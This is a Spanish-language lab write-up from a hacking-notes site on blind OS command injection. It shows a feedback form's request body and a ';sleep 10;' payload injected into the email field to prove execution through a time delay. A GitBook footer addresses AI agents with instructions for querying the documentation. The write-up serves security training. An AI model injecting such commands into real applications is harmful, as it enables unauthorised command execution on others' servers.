> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/command-injection/blind-command-injection-with-time-delay.md).

# Inyección de comandos ciega con retraso de tiempo

### Inyección ciega de comandos del sistema con redirección de salida

Este laboratorio presenta una vulnerabilidad de inyección de comandos del sistema en la funcionalidad de comentarios. / La aplicación ejecuta un comando de shell construido a partir de los datos proporcionados por el usuario. La salida de este comando \*\*no aparece en la respuesta HTTP\*\*, lo que la convierte en una inyección ciega. / El objetivo es explotar esta falla para provocar un retraso de 10 segundos\*\*.

#### **Análisis del formulario**

La página Enviar comentarios envía los siguientes datos:

<figure><img src="/files/3565abb788839fd200b53a430a7aa2ac02c96a52" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com&subject=hello&message=hello1234
```

{% endcode %}

Dado que se transmiten varios campos, la inyección consiste en \*\*añadir un punto y coma antes y después del comando\*\*, de modo que el shell lo interprete por separado.

Ejemplo de carga útil para generar un retraso:

```bash
;sleep 10;
```

#### **Campo inyectable**

El **correo electrónico** el campo reacciona a la inyección: la respuesta realmente tarda **10 segundos**, prueba de que el comando se ejecuta.

Ejemplo de solicitud modificada:

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;sleep 10 ;&subject=hello&message=hello1234
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/command-injection/blind-command-injection-with-time-delay.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
